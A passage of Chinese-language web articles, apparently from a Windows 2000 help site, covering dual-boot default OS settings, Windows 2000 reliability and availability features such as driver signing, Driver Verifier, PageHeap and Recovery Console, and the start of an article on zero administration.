如果希望应用程序在双重引导计算机的两个操作系统上运行，则需要在每个操作系统上分别安装所有程序。Windows 2000不支持跨越操作系统共享程序。

■指定启动时默认的操作系统

如果在计算机上使用双重引导配置，在每次启动计算机时都可以在操作系统之间（或相同操作系统的不同版本之间）做出选择。

指定启动的默认操作系统：

在控制面板中打开系统，单击“高级”选项卡上的“启动和故障恢复”。如果不想从启动期间显示的列表中选择，请在“系统启动”下面的“默认操作系统”列表中，单击需要启动的操作系统，在“显示操作系统列表”框中，键入自动启动默认操作系统之前显示该列表的秒数。

返回


Windows 2000的可靠性

《一键清理系统垃圾》

Windows 2000的可靠性

    Windows 2000作为新一代的网络操作系统家族，无论在性能上还是可靠性上都有了质的飞跃。在Windows 2000中，微软已经针对可能影响可靠性的软硬件和系统管理问题专门进行了加强。Windows 2000在三个主要的方面改进了可靠性。首先，对结构进行了修改，主要目的在保护操作系统的内核和共享内存，因此增强了系统的稳定性。第二，开发了新的工具可以帮助开发者创建更可靠的代码。第三，Windows 2000包含了新的管理特性可以提高可靠性。在本文中将对这些增强和新特性进行专门介绍

    介绍

    对操作系统来说，用户的主要需求就是系统的可靠性。我们平常提到的可靠性实际上指的是两个方面的操作系统特性：可靠性和可用性。在提到操作系统的时候，可靠性是指一台服务器如何相容的运行应用程序和服务而尽量少的发生错误，可靠性越高就表示系统发生错误的机会越少；而可用性是指系统可以使用的时间，可用性高就表示系统可用使用的时间多，因为日常维护和意外错误导致的宕机时间就少。可靠性可以通过减少潜在的系统失败的原因来提高，而可用性则可以通过解决宕机的原因来解决。简而言之，一个可靠的和可用的系统很少失败，在关机后也很容易重新启动

    Microsoft Windows 2000 操作系统家族在硬件、软件和系统管理方面进行了增强以解决可用性和可靠性的问题。微软利用内部和从客户处搜集的大量数据来分析引起Windows NT 4.0失败的原因。这些信息帮助微软增强了Windows 2000的稳定性和可靠性，并且帮助微软开发了工具，这些工具可以帮助管理员更快得分析问题，以及更快得从不可避免的失败中恢复。

    Windows 2000 在三个主要方面提高了可靠性和可用性：对操作系统进行基本的改进，帮助开发人员创建可靠的代码，提供管理员提高系统可用性的新的工具。

    首先，通过结构的修改，操作系统的稳定性得到了增强，结构的修改主要集中在保护操作系统的内核和共享内存上面。包括：
·内核模式的写保护，这有助于阻止错误的代码干涉操作系统的工作。
·Windows 文件保护，阻止新的软件安装替代了基本的系统文件。
·Windows 2000 使用Driver Signing （驱动程序数字签名）来识别通过了Windows Hardware Quality Labs 测试的驱动程序，并且在用户将要安装没有数字签名的驱动程序时对用户提出警告。

    第二，新的工具可以帮助开发人员创建更可靠得驱动程序。例如，一个公共的驱动程序问题的来源是不正确的使用共享内存。Pool Tagging 和 Guard Pages 特性使得跟踪内存使用更加简单，因此可以帮助开发人员对设备驱动程序进行调试。Driver Verifier 和 Device Path Exerciser 工具可以让开发人员检查错误分类，而在以前这些问题在测试环境中很难发现。

    第三，Windows 2000 包括了新的管理特性，这些特性和增强改进了可用性。其中最重要的是减少了要求系统重新启动的维护功能的数目。关键的诊断过程运行的更快速，例如进行硬盘检查或者在系统失败时创建一个关于内存使用的详细报告。另外的几个改进减少了关机和重新启动的时间。

    本文将对这些改进在技术方面做一个全面的介绍

    系统结构和内存使用

    可靠性和可用性的改进的核心是对操作系统和内存的保护。许多会引起系统不稳定的问题主要是由于对操作系统内核（在内核中执行着基本的系统服务）的意外的影响，。因为内核控制着整个操作系统，所以影响内核的代码错误对可靠性有极大的影响。影响内存的错误也是不稳定的一个经常的来源。

    Windows 2000操作系统提供了一个应用程序运行的环境。它包含了一系列的小软件组件，它们在一起工作来执行任务。每一个组件提供了一系列的功能来作为系统其它部分的接口。这些模块提供了访问CPU和其他硬件资源的方式。操作系统还提供了使程序和组件可以互相通信的机制。

    核心模式和用户模式

    Windows 2000 将执行代码分为以下两种模式

    用户模式

    用户模式中的软件在没有特权的状态下运行，对系统资源只有有限的访问权限。例如，软件不能直接访问硬件。Windows 2000基础的应用程序和被保护的子系统运行在用户模式下。被保护的子系统运行在自己的空间内，不会互相干涉。

    核心模式

    在核心模式中，软件可以访问所有的系统资源，例如计算机硬件和敏感的系统数据。核心模式中的软件构成了操作系统的核心，它们可以分为如下几组：
·Executive（执行体） 包含为环境子系统和其他执行体组件提供系统服务的系统组件。它们执行的系统任务包括输入/输出，文件管理，虚拟内存管理，资源管理，以及进程内部通信等等。
·Device drivers（设备驱动程序） 将组件的调用（例如，请求打印机）翻译为硬件操作。
·Hardware abstraction layer（HAL，硬件抽象层） 将Windows 2000 Executive 的其它部分与特定的硬件分离开来，使操作系统与多处理器平台相兼容。
·Microkernel（微内核） 管理微处理器。它执行一些重要的功能，例如调度，中断，以及多处理器同步等。

    内存模型

    Windows 2000 增添了新的特性以解决因为共享内存的不同的处理方式引起得问题。要理解这些改进，就要先理解Windows 2000是如何管理内存的。

    Windows 2000 使用虚拟内存管理器来管理虚拟内存和物理内存。

    虚拟内存指操作系统如何使内存对应用程序可以使用。Windows 2000 支持4GB的虚拟内存。其中2GB为核心模式使用，另外2GB为核心模式和用户模式共同使用。

    物理内存指计算机中安装的内存芯片。虚拟内存管理器（VMM）使用内存映射表来跟踪每一个进程使用的虚拟内存地址以及这些地址引用得实际数据在物理内存中的位置。为了让多个应用程序可以共享内存空间，VMM使用一个叫做PAGING的进程在物理内存和硬盘之间交换内容。这些被交换的内容叫做page files.
可靠性改进

    由于提供预先检测，阻止了应用程序、服务或设备驱动程序对内存的不正确使用，Windows 2000提高了可靠性。操作系统可以非常出色的管理应用程序以及系统的错误，使得系统不会宕机。另外，为了保证一个程序的失败不会导致影响操作系统或者其他应用程序的运行，其他的子系统与应用程序被隔离在单独的内存空间中。

    在Windows 2000中对可靠性的改进主要在三个领域：结构改进，核心模式代码开发工具，以及用户模式代码开发工具。

    结构改进有助于保护操作系统核心模式操作。这些改进包括：
·核心模式写保护
·Windows 文件保护
·驱动程序数字签名

    核心模式写保护

    为了保护操作系统中的每一部分不会受其它部分的错误的影响，Windows 2000在内核部分和设备驱动程序中添加了写保护和只读部分，正象Windows NT总是有用户模式应用程序和动态连接库一样。

    为了提供这种保护，物理内存映射标志出包含代码的内存页面，保证它们不能够被覆盖，即使是操作系统也不能。这样就阻止了核心模式软件破坏了其他核心模式软件。这些特性在缺省情况下是激活的，当然如果用户和开发人员愿意的话，可以关闭这些特性。

    Windows 文件保护

    在Windows 2000以前的Windows版本中，安装软件可能覆盖共享的系统文件（例如，DLL，和可执行文件）。如果系统文件被覆盖，系统性能就会变得不可靠，程序的行为就会混乱，操作系统可能会失败。

    Windows 文件保护在安装前检查原来的系统文件的版本。这样就保证象.sys, .dll, .ocx, .ttf, .fon, .exe等系统文件不会被替代。Windows 文件保护在后台运行，保护所有的由Windows 2000安装程序安装的文件。它检测其他程序要替换或删除一个被保护的系统文件的企图。Windows 文件保护检查文件的数字签名来确定新文件是否为正确的版本。如果这个文件的版本不正确，Windows文件保护就从dllcache目录，网络安装路径或者Windows 2000光盘中替换这个文件。如果Windows文件保护找不到合适的文件，它就会提示用户输入正确的路径。Windows文件保护还会将替换文件的企图写入事件日志。

    缺省情况下，Windows文件保护是被激活的，只允许在安装下面的软件时替换被保护的系统文件：
·使用Update.exe安装Windows 2000 Service Packs
·使用Hotfix.exe
·使用Winnt32.exe进行操作系统升级
·Windows Update
·Windows 2000 Device Manager/Class Installer

    驱动程序签名

    驱动程序签名有助于提高驱动程序的质量，因为它允许Windows 2000和Windows 98通知用户他们安装的驱动程序是否通过了微软的认证程序。驱动程序签名将一个加密的数字签名附加在通过了Windows Hardware Quality Labs (WHQL) 测试的代码文件上。.

    如果驱动程序运行在Windows 2000和Windows 98操作系统中，那么给驱动程序签名则是WHQL测试的一部分。数字签名与独立的驱动程序包结合在一起，Windows 2000可以识别它。这种认证证明用户使用的驱动程序是经过微软测试的那个驱动程序，如果在该驱动程序被放在HCL中后被修改过，Windows 2000就会通知用户。

    驱动程序允许三种反应：Warn，Block，Ignore.
·Warn 在被安装的驱动程序没有数字签名的情况下，让用户了解，并且让用户决定是否安装。Warn还让用户可以选择安装一个被保护的驱动程序文件的没有签名的版本。
·Block 禁止安装所有的没有签名的驱动程序。
·Ignore 允许安装所有文件，不管这些程序是否有数字签名。

    缺省情况下，Windows 2000 以Warn方式发布。

    核心模式代码开发

    如前所述，软件可以被分为两类：用户模式软件和核心模式软件。那些有助于程序员创建可靠的用户模式的应用程序的开发工具对开发核心模式代码的程序员来说就不合适了。因为编写核心模式代码由特定的要求，Windows 2000 Server中的可靠性的改进就包括专为核心模式开发人员使用得开发工具。

    设备驱动程序是核心模式代码，它将操作系统和硬件联系到一起。为了使系统的性能达到最大，核心模式代码没有应用程序那样的内存保护机制。相反，操作系统充分信任核心模式代码没有错误。这就是为什么为了与其他的驱动程序和操作系统组件安全的协调工作，这些驱动程序和核心模式代码必须遵循复杂的规则的原因。一点点偏差就会导致其他核心模式的错误。

    某些核心模式代码错误在测试阶段就可以发现。但是，像内存不足等错误，则可能经过很长时间才能导致系统崩溃，因此要找到在那儿产生的错误非常困难。另外，对驱动程序开发人员来说，要完全测试核心模式代码也是非常困难的，因为要模拟驱动程序将会碰到的整个环境是非常困难的。

    为了解决这些问题，Windows 2000 Server 增加了下面的特性和工具来帮助开发人员创建更高质量的驱动程序：
·Pool Tagging
·Guard Pages
·Driver Verifier
·Device Path Exerciser

    Pool Tagging

    Windows NT 4.0 内核包含完全共享的内存池，它被分配给各个任务，当不再需要时内存被返回给内存池。如果设备驱动程序发生错误的话，这种共享内存方式就会带来问题。一个经常发生的错误就是让核心模式组件对分配给它的内存以外的内存空间进行写操作。这样做将会引起另外的核心模式组件崩溃，从而导致系统失败。

    另一个经常会发生的错误是为一个驱动程序的进程分配了内存，但是在进程结束后却没有释放，这种情况会产生内存不足的问题。内存不足经常导致系统挂起---挂起的时间依赖于当时的环境。例如，一个请求了很少量的驱动程序，没有释放掉它的内存将会花很长时间才能消耗掉整个内存池。

    所有的这些错误可能很难被跟踪。为了帮助开发人员发现并且修复这些错误，微软在Windows 2000中增加了Pool Tagging，或者称为（Special Pool）。这个工具在Windows NT 4的Service Pack 4中就存在了。

    Guard Pages

    Guard Pages 工具创建了Special Pool (Pool Tagging)的边界。这些内存页面让开发核心模式代码的开发人员能够发现覆盖代码的错误。当程序分配内存区域，然后又要在该区域之内进行写操作时就会发生这种错误。而使用了Guard Page，当程序请求内存区域时，操作系统将内存区域从页面内存的边界开始分配。然后，操作系统就映射下一个页面为Guard Page，并且设置这些页面，使得代码不能够访问它们。如果程序试图对这些内存区域进行写操作的话，它会碰到Guard Page，而这些页面是不能写的，系统将产生一个硬件错误，从而导致系统失败。这种引导出的失败警告开发人员，他们的应用程序的写操作超出了范围。

    Driver Verifier

    Driver Verifier 是Windows 2000内核中增加的一系列的检查。这些检查有助于发现核心模式中包含的错误。因为Driver Verifier 影响性能，因此不应该连续使用，也不应该在实际环境中使用。在测试新的应用程序或者在实际环境中为后面的重复使用进行配置时，这是理想的工具。Driver Verifier 在进行技术支持时也非常有用，例如有一个特定的驱动程序被怀疑引起系统崩溃了。Driver Verifier 还包含一个Verifier.exe文件，这是一个用来管理driver verifier设置的图形界面的工具。

    Driver Verifier 测试特定的错误条件集合，当发现新的可能的错误模式时，这些错误就被添加到测试集合中。Driver Verifier可以测试下面几种类型的错误：
·Memory corruption. 要想用Driver Verifier发现内存错误，必须保证驱动程序的所有内存都来自于Special Pool。Driver Verifier 检查类似于spinlocks， 使用未初始化的变量以及内存错误等等的错误。
·Writing to pageable data. 这种测试寻找那些以提高的中断级别或者具有spinlock访问可以交换的资源的驱动程序。这是一个致命的错误，但是只会发生在一个具体的工作环境中。为了测试这个错误，当一个驱动程序得到spinlock或者提高了中断级别时，Driver Verifier 就会使所有的可交换的代码，数据，和内存池无效。如果驱动程序试图写这些可交换的代码，硬件将生成一个页面错误提示驱动程序试图写无效的数据。
·Handling memory allocation errors. 一个经常发生的编程错误是在核心模式不能为驱动程序分配请求的内存时，驱动程序中没有适当的代码处理这种情况。在过去，驱动程序编程人员不能强迫内核返回内存分配失败。因此，他们缺少创建好的测试环境的能力。Driver Verifier可以配置将随机的内存分配错误映射到特定得驱动程序。

    Device Path Exerciser

    Device Path Exerciser (Devctl)测试设备驱动程序如何处理错误。它利用各种各样的用户模式I/O接口同步或者异步调用驱动程序，并且测试驱动程序如何处理错误的请求。例如，它可能连接到网络驱动程序并且请求它回卷磁带。可能连接到打印驱动程序并且请求它重新同步通信线路。或者，它也可能使用一个错误的缓冲区请求某个设备功能。这样的测试帮助开发人员使得驱动程序在错误的条件下更强壮

    用户模式代码开发

    Windows 2000 包括一个新的工具---PageHeap。它可以帮助开发人员在开发非核心模式代码的时候找到内存访问错误。

    PageHeap

    Heap(堆)指的是用于临时存放代码的内存。堆错误在应用程序开发中是一个经常遇到的问题。最典型的发生堆错误的情况是一个应用程序分配了一个特定大小的内存块，但是却在该范围之外进行写操作。另一个发生错误的原因是正在写的内存块已经被释放掉了。在这些情况下，可能会出现两个应用程序写同一部分内存，从而导致系统失败。Windows 2000中新添加的PageHeap特性就可以帮助开发人员发现它们的内存错误。

    当PageHeap 被激活时，该应用程序的所有的堆分配被放到内存中，这样堆的边界就与虚拟内存的边界排在一起了。与堆相邻的虚拟内存页面被设置为NO_ACCESS。在该应用程序中对堆后面的空间的访问就会立刻引起错误，这就可以在一个调试工具中被捕获，开发人员就可以找到出错的代码。

    在释放堆时，过程与之类似。PageHeap修改释放的应用程序虚拟页面为NO_ACCESS，这样，如果应用程序试图读写该内存时就会发生访问错误。

    如果为一个应用程序运行PageHeap特性，应用程序要比正常时运行得慢，并且需要更多的虚拟内存，因为每一个堆的分配都需要两个完整的虚拟内存页面。随着应用程序对堆的使用的增加，可能需要增加系统的虚拟内存的大小，否则会出现虚拟内存不够的错误信息。除非系统有相当大的虚拟内存，否则建议不要同时运行两个以上的激活了PageHeap特性的应用程序。

    可用性的改进

    Windows 2000中对可用性的改进减少了为了正常的维护工作而导致系统离线的时间。它还提高了恢复速度，增强了数据存储功能。

    既然系统失败是不可避免的，管理员就必须能够快速的备份重要的数据，在系统崩溃时能够迅速抽取信息以确定发生错误的原因---不管这个问题是硬件的，操作系统的，还是第三方的产品。相似的，企业级的关键任务的应用程序还需要能够在发生错误的情况下快速的保存关键的数据，并且能够自动定位响应组件。

    下面的特性减少了为了维护而必须使系统离线的时间，也减少了诊断系统错误和重新启动系统的时间：
·减少维护宕机时间
·改进的诊断能力
·更快的系统恢复和重新启动
·提高的存储管理
·改进的集群

    减少维护宕机时间

    Service Pack Slipstreaming

    Service Pack (SP) 可以非常容易得添加到基本得操作系统中，这就意味着客户不需要在安装完新的组件后重新安装SP。Sp可以作为安装共享，这样就总是可以使用正确的文件和注册表入口。这样就允许用户创建自己的Windows 2000的软件包，其中包含适当的SP和Hotfix。

    减少了维护所需要的重新启动的次数

    在Windows NT 4.0中有许多配置修改需要重新启动计算机，在Windows 2000中不再需要了。这些工作包括：
    文件系统维护
·扩展一个NTFS卷
·镜像一个NTFS卷

    硬件安装和维护
·将笔记本计算机插入或移出坞站(dock)
·激活网卡或者使网卡失效
·安装或者删除PCMCIA设备.
·安装或删除即插即用存储设备
·安装或删除即插即用调制解调器
·安装或者删除网络接口控制器
·安装或者删除Internet Locator Service.
·安装或者删除USB设备，包括鼠标，游戏杆，键盘，视频捕获设备，以及扬声器

    网络和通信
·添加或删除网络协议，包括TCP/IP，IPX/SPX，NetBEUI，DLC，AppleTalk
·添加或删除网络服务，包括SNMP，WINS，DHCP，RAS
·添加PPTP端口
·修改IP设置，包括缺省网关，子网掩码，DNS服务器地址和WINS服务器地址
·修改ATMARP服务器的ATM地址
·如果有多于一个网卡，修改IP地址。
·修改IPX帧类型
·修改协议绑定顺序
·为AppleTalk工作站修改服务器名。
·在安装了拨号网络客户并且运行着RAS的系统中安装拨号网络服务器
·加载并使用TAPI provider
·解决IP地址冲突
·在静态和动态IP地址之间转换
·转换MacClient 网卡并且查看共享卷。

    内存管理
·添加新的PageFile
·增加PageFile的初始大小
·增加PageFile的最大值

    软件安装
·安装设备驱动程序工具集 (DDK)
·安装软件开发工具集 (SDK)
·安装Internet Information Server
·安装Microsoft Connection Manager
·安装Microsoft Exchange 5.5
·安装Microsoft SQL Server? 7.0
·安装Microsoft Transaction Services
·安装或删除File and Print Services for NetWare
·安装或删除Gateway Services for NetWare

    性能优化
·在应用程序和后台服务之间修改性能优化参数

    改进的诊断能力

    在Windows 2000中有助于帮助用户快速排除系统错误的特性包括：
·Kernel-only crash dumps
·更快的CHKDSK
·MSINFO

    Kernel-Only Crash Dumps

    除了完全的崩溃时内存转储之外，Windows 2000 Server支持核心模式的崩溃时内存转储，允许具有大内存的系统能够更快的重新启动。当Windows NT 的系统崩溃时，所有的当时内存中的信息被存储在硬盘上。管理员和开发人员使用这些信息（这些信息被称为crash dump）进行排错。为了保证这些信息被安全的转移到硬盘上，操作系统使用相当保守的算法来处理这些内存信息。

    因为Windows 2000支持64GB的物理内存，所以完全的内存转储可能非常慢，这样就会严重的影响系统重新启动的时间。例如，一台安装了1GB的内存的Pentium Pro计算机大约需要20分钟的时间将内存转储到页面文件中。系统重新启动时，将要花费大约25分钟的时间将转储数据从页面文件拷贝到转储文件中。这就意味着大约有45分钟的时间系统不能够使用。

    所以，在完全的崩溃时内存转储之外，Windows 2000还支持核心模式崩溃是转储。这样就可以在更短的时间内和更少的空间中完成与核心模式相关的错误。当一个安装了非常大的内存的系统需要很快能够工作时这一特点非常有用。随着系统的使用，核心模式的转储可能会将转储文件的大小和转储的时间减少到80%。

    使用核心模式崩溃时转储需要进行平衡。因为重要的数据总是存在于用户模式中而不是核心模式中，所以，使用这种方法可能会丢失重要的数据。

    更快的CHKDSK

    CHKDSK命令用于检查硬盘错误。尽管这是一个强有力的工具， 有时它也可能花费几个小时，时间的长短依赖于该磁盘分区的文件配置。在Windows 2000中的CHKDSK的性能改进了非常多。由于有如此多的因素会影响CHKDSK的性能，因此要评价这些改进非常困难。在某些配置的情况下，Windows 2000中的CHKDSK的速度要比Windows NT 4.0中快10倍。CHKDSK可以在Windows 2000 Recovery Console 中找到。

    MSINFO

    MSINFO提供可以用于排错的信息。在微软的其他产品中也有这个工具，这个工具可以在System Information Microsoft Management Console插件中找到。MSINFO可以用于几种途径。在电话支持中，一个工程师可以要求用户运行MSINFO，提供相关的信息。或者，用户可以使用MSINFO生成系统信息，这些信息可以保存起来交给支持工程师。

    更快的系统恢复和重新启动

    Windows 2000中的改进减少了从一个崩溃的系统中进行恢复的时间，也较少了重新启动操作系统的时间。这些改进包括：
·Recovery Console
·Safe Mode Boot
·Kill Process Tree
·Recoverable File System
·Automatic Restart
·IIS Reliable Restart

    Recovery Console

    Windows 2000 Recovery Console 是一个管理员使用的命令行工具，它可以从Windows 2000安装光盘上得到。它可以从Windows 2000光盘或者启动软盘上以文本方式运行，然后在出现Welcome屏幕时选择Repair选项。为了使用起来更加简单，也可以将它配置为boot.ini文件中的一项（运行Winnt32/cmdcons）。

    Recovery Console 对于修复系统来说非常有用，它将启动软盘或Windows 2000光盘中的文件拷贝到系统中。利用Recovery Console，用户可以启动和停止服务，格式化驱动器，在本地驱动器上读写数据，以及执行许多其他的管理任务。

    因为Recovery Console允许用户在使用Windows 2000引导软盘时读写NTFS分区，它有助于组织减少或者消除在系统恢复时对FAT和DOS引导盘的依赖。另外，它提供了一系列的方式，这些方式有助于管理员可以通过一系列的命令恢复Windows 2000的安装，同时保持了Windows 2000的安全性。用户可以登录到他们要访问的Windows 2000中。另外，使用Recovery Console，文件不能从系统拷贝到任何可移动介质上。

    Safe Mode Boot

    为了帮助用户和管理员诊断类似于错误的设备驱动程序等系统问题，Windows 2000操作系统可以以Safe Mode Boot启动。用户可以在系统启动的过程中出现Please select the operating system时按F8选择该选项。在安全模式中，Windows 2000使用缺省的硬件设置（鼠标，显示器，键盘，硬盘，基本的显卡，缺省的系统服务，以及没有网络）。安全模式启动允许用户修改缺省设置，或者删除一个产生问题的新安装的驱动程序。

    在安全模式选项之外，用户可以选择Step-by-Step Configuration Mode，这种模式可以让用户可以选择基本的文件和服务来启动，或者选择Last Known Good Configuration，这种配置用上次关机时保存的注册表信息来启动计算机。

    Kill Process Tree

    如果一个应用程序对系统不再响应了，用户需要一种方法来停掉它。Windows NT 4.0使用Task Manager让用户选择一个进程或应用程序并且停止掉它。这个方法并不总是有效，然而，因为程序可能有几个进程，因此很有可能形成一个进程树。问题就产生了，因为很有可能停掉了一个进程，而其他的子进程仍然在运行着。

    因此，Windows 2000提供了一个叫做Kill Process Tree的工具，这个工具允许Task Manager不止停掉一个进程，而且还能够不用重新启动系统就停掉该进程产生的其他的进程。Kill Process Tree在系统由于运行了许多进程而非常慢的情况下非常有用。

    Recoverable File System

    Windows 2000 文件系统(NTFS) 更不容易出错，因为它将所有得磁盘I/O作为一个唯一的事务。一旦发生问题，文件系统可以在系统恢复时很快地回滚整个事务或者重新执行整个事务。这样就减少了系统不能使用的时间，因为文件系统可以被很快地恢复到可以正常工作的状态。

    Automatic Restart

    Windows 2000中的错误处理子系统和被保护的子系统减少了系统崩溃的可能性。然而，一旦系统不幸的崩溃了，系统可以设置为自动重新启动。另外，在重新启动前，内存中的内容可以写入日志文件中以帮助管理员确定崩溃的原因。因为Windows 2000中写入的日志文件总是相同的名字（缺省情况下为memory.dmp），因此在系统重新启动后，你应该为它重新命名。

    IIS Reliable Restart

    过去，重新启动系统是重启IIS服务的一个可以接受的方案，尽管不是一个最有效的方案。为了可靠的重新启动IIS，管理员需要重新启动四个服务，必须具有这一方面的专门知识，例如NET命令的语法。为了避免这些麻烦，Windows 2000中提供了IIS Reliable Restart特性，这是一个更快的，更简单的，也是更灵活的单步启动过程。

    用户可以在MMC中通过鼠标右键重新启动IIS，也可以使用命令行应用程序。命令行应用程序可以通过其他的微软软件或第三方的工具来运行。如果INETINFO进程被不正常的停止了，IIS服务就可以通过Windows 2000 Service Control Manager的功能自动重性启动。

    Storage Management

    为了避免缺少磁盘空间带来的系统问题，Windows 2000提供了一些存储上的改进来帮助管理员花费最少的工作来维护足够的自由空间。例如，管理员可以不用关闭系统或者打断用户的工作就可以执行创建卷，扩展卷，或者镜像卷的任务。.

    Windows 2000中的存储管理特性包括：
·Remote Storage Services. Remote Storage Services (RSS) 自动监视本地硬盘的自由空间。一旦主硬盘的自由空间在必须的水平以下，RSS就自动将已经备份的数据自动移动到远程的存储设备上，这样就可以提供需要的自由空间了。
·Removable Storage Manager. Removable Storage Manager (RSM) 允许多个应用程序共享本地的软盘和磁带驱动器，在一个服务器的系统中控制可以移动的媒体。
·Disk Quotas. Windows 2000 Server 支持磁盘配额，这个功能可以监测和限制NTFS分区的磁盘空间。操作系统根据用户拥有的文件和文件夹计算每个用户使用的磁盘空间。应用程序分配给用户的磁盘空间不能超过用户的磁盘配额减去已用的空间。
·Dynamic Volume Management. 允许不用关闭系统或者打断用户的工作就可以进行在线的管理任务。
Clustering（集群）

    集群指将单独的服务器连接起来并且协调他们之间的通信，使他们可以作为一个整体来运行。如果任何一个服务器不能工作了，它的工作就自动转移到另外一台服务器继续进行（这个过程称为FAILOVER）。某些形式的集群使用负载平衡，这种功能使得计算的工作可以通过网络分配到相互连接的服务器上。

    Windows 2000Advanced Server中集群的系统服务是一个标准的部件。一个服务器集群就是一个独立的服务器集合，这些服务器可以互相管理。集群的目标是提供高度的应用程序和数据的可用性。

    集群使宕机的时间减到最少，减少了IT支持的花费，因为它提供了一个即使一个系统失败了整个系统也可以继续运行的结构。这就意味着集群解决了计划中的宕机（例如硬件或软件升级）和意外的宕机.

    使用集群可以帮助组织减少总体花费。集群可以通过较便宜的硬件来构建，使用标准的连接和存储系统。微软与硬件制造商一起工作来测试和检验服务器和网络产品。

    Advanced Server 提供了集群的系统服务，支持两个节点的集群。这个技术基于非常成熟的Windows NT Server 4.0 Enterprise Edition中的Microsoft Cluster Services (MSCS) 两节点集群技术，同时进行了下面的增强：
·支持rolling upgrades
·支持Active Directory? directory service 和 MMC 集成
·从网络恢复
·Health monitoring.
·网络和磁盘的即插即用支持
·WINS， DFS，和DHCP支持
·对Cluster API的COM支持

    Windows 2000 Datacenter Server支持四个节点的集群

    总结
    Windows 2000 Server操作系统与Windows NT的前面的版本相比，解决了大量的影响可靠性和可用性的问题。有助于防止系统失败的特性会提高可靠性。这些失败经常是由于有问题的核心模式软件，或者内存冲突等引起的。过去，要创建和测试那些可靠得与操作系统内核通信的以及不会与其他的软件使用的内存产生冲突的软件非常困难。为了减少错误代码，新的核心模式代码测试工具使得开发人员更加容易的创建可靠的驱动程序和其他的系统组件。另外，结构的修改也有助于保护系统内存和核心的操作系统进程。

    可用性通过减少维护和失败后重新启动所用的时间得到提高。Windows 2000引进了新的管理和维护特性来解决这些问题。通过减少大量的要求系统重新启动的任务，日常的维护不再像过去一样要求那么多的宕机。并且在系统失败时，改进了工具使得确定问题的原因和重新启动计算机更快乐。

    Windows 2000中的可靠性和可用性的改进意味着商业用户可以信任并且依赖于他们的系统，从而为他们的系统用户和客户提供更高的满意度。对于IT用户来说，改进提供了更强壮的系统结构，更少的重启次数，以及更加可靠的应用程序性能。

返回


Windows 2000的零管理

《一键清理系统垃圾》

Windows 2000的零管理

    当今计算机在商务中越来越流行，同时紧张的IT预算使得很多大公司把更多的注意力集中到如何降低TCO（TOTAL COST OF OWNEERSHIP）上。因此考虑全面的和长期的计算解决方案以及如何适应所有的组织需要是构建企业的信息系统所必需的。

    微软致力于通过微软的客户策略满足这些需要。这些策略将给客户一个完整的解决方案，这个解决方案能解决今天客户面对的核心问题---如何降低TCO和增加投资回报率。微软通过这些解决方案最大化的保护保护客户的投资。

    当前，微软降低TCO的策略主要有两部分：零管理和网络PC规范。零管理是微软客户策略的一个重要的组成部分。它使用了一系列核心技术，这些技术给IT专家新的控制能力和方便管理的基于视窗的客户端。这种能力主要是通过自动执行的任务来实现的，如操作系统的升级和应用程序的安装，集中管理的工具和桌面系统的锁定。这些技术使用户在不同的PC之间漫游时不再需要重新安装他们的应用程序和文件，因此减轻了普通用户的工作负担，同时使得由于应用程序不兼容引起的问题大大减少了。零管理将使得应用程序的软件安装更加方便，并且能够开发更广泛的应用程序。而且所有的这些好处都不需要牺牲与现有基于视窗的软件兼容性。

    零管理的主要能力：

    1.自动系统升级和应用程序安装
    2.持久的缓存数据和配置信息
    3.集中管理和系统锁定
    4.应用程序的弹性适应设计最好的解决方案

    自动系统升级和应用程序的安装

    以前的软件安装和维护是非常繁琐的，并且非常容易出错。在零管理中，这个过程是完全自动化的，因此变得非常简单。当安装一个系统组件，设备驱动程序或者一个新版本的操作系统时，Windows 2000可以被配置成自动升级这些软件。系统自动引导和检查所有的Internet /Intranet升级。如果发现一个需要升级的软件，不须用户干涉系统就可以自动升级它。例如，如果用户打开一个Word文件，但是Word运行所需要的某个文件（例如WinWord.exe）被删除了，这时系统将会自动重新安装这个文件。

    事实上，零管理意味着用户不需要执行管理工作。建立一个集中的策略的能力意味着组的成员用户将有一致的硬件和软件配置，因此可以从技术支持上排除一个系统中的不一致的成分。备份、搜索病毒和检查过期的文件全部是在服务器上进行的。管理员也可以阻止用户安装不干净的应用程序（将导致病毒或者不兼容的动态链接库和删除他们不应该删除的文件）。整个系统被保护起来，减少了用户出错的可能。

    零管理减少了软件和硬件的管理负担。从一个中心的服务器，管理员可以远程的在用户的计算机上安装操作系统。这个操作系统可以通过给每一个应用程序定义的软件包来运行一个安装服务。当文件开始安装时，一个系统的数据库自动跟踪，找到应用程序属于谁以及在用户的计算机上什么地方安装，也能跟踪版本号和动态链接库的参数。

    历史记录使得可以很方便得回收一个不成功的安装、以后的反安装、或者重建一台丢失或者被破坏（特别对笔记本更方便）的计算机。它阻止共享的动态链接库被其他应用程序的反安装意外的删除掉。它也可以作为一个自动升级的触发器。当用户进行系统引导时，它依靠管理策略来检查用户的操作系统的版本号和应用程序，如果需要一个升级，它就自动开始。用户不需要关心新的软件安装

    集中管理的工具

    集中管理工具被称为Microsoft Management Console(MMC)。微软的工具和其他软件厂商的工具可以简单的被集成在这个控制台中。目标是让管理员创建一个简单的自定义的能够完成自己的管理工作的统一界面。这包括大型主机、微机和通常的网络操作系统。就像Windows和Windows NT的管理工作一样。

    在Windows 2000中，MMC与AD（Active Directory）集成，提供了一个简单的监视和访问所有管理对象的地方。通过MMC，管理员可以跟踪和配置存储在AD中的用户和资源。通过其他的Windows 2000的分布式服务：分布式安全、分布式文件系统、分布式时间共享，AD将能够使分开的物理服务器表现的像一个服务器，无论这些服务器存在于同一间房间中，还是被分布在多个地点。Windows 2000将提供需要的工具使管理员在AD中的集中位置管理整个物理网络拓扑和它的逻辑视图（域树和所有目录对象的操作）。因此即使一个网络中的服务器的数目增长的很多，管理负担也并没有增加。

    集中管理和系统锁定

    在许多组织中，用户控制他们的PC，有能力安装任何他们愿意安装的硬件和软件。当这种级别的控制可以适应用户需求的时候，将导致一个系统中的计算机没有两台PC是一样的。为了解决这个问题，在某些环境下，Windows 2000将强制执行某些功能（例如，不许用户自己安装某些软件）。

    Windows 2000提供对于用户来说是不可见的各种各样的设备，在用户看来仅仅是一个简单的驱动器盘符。并且，任何用户不需要的文件，例如系统文件，将通过Access Control Lists(ACLs)的安全性阻止篡改和无意识的破坏。

    管理员可以集中的控制应用程序环境，他们可以指定使用者可以访问哪些应用程序，以及在满足用户的环境需要的前提下进行细化的控制。

    当与Network PC Specification集成时，IT的管理者能限制用户重新配置硬件环境，保证硬件的同一性和兼容性。

    持久的缓存数据和配置信息

